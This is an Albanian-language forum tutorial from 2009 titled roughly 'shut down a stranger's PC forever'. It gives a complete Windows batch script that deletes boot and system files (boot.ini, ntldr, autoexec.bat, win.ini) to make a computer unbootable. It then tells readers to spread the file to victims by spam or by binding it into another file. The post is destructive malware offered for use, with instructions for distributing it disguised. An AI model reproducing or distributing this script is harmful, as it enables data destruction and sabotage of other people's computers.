Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Fike nje PC te huaj ... pergjithmon

Shko poshtë 
AutoriMesazh
Crespy
Moderator
Moderator
avatar

Postimet : 162

MesazhTitulli: Fike nje PC te huaj ... pergjithmon   Sat Apr 11, 2009 11:58 pm

Fike nje PC te huaj ... pergjithmon

--------------------------------------------------------------------------------

Fillimisht ,unë nuk mbajë përgjegjsi per dëmet që mundë ti shkaktoni ju.
Hapim Notepadin dhe vendosim këtë kodë:
---------------------------------------------------------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini-----------------------------------------------------------
E ruajmë këtë fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat
Për ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.
Kujdes! Mos e hapni këtë fajll ne PC tuaj.
Tash ju mbetet ta shperndani si të dëshironi ju ,me spam apo edhe tia bashkangjitni një fajlli tjetër me ndonjë file binder
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Fike nje PC te huaj ... pergjithmon
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Meditimi Transcedental - kurs me mesues te huaj ketu ne Tiranë
» Legjenda e ''Shkëmbit te Vajtimit''

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Tutorials & Mësime-
Kërce tek: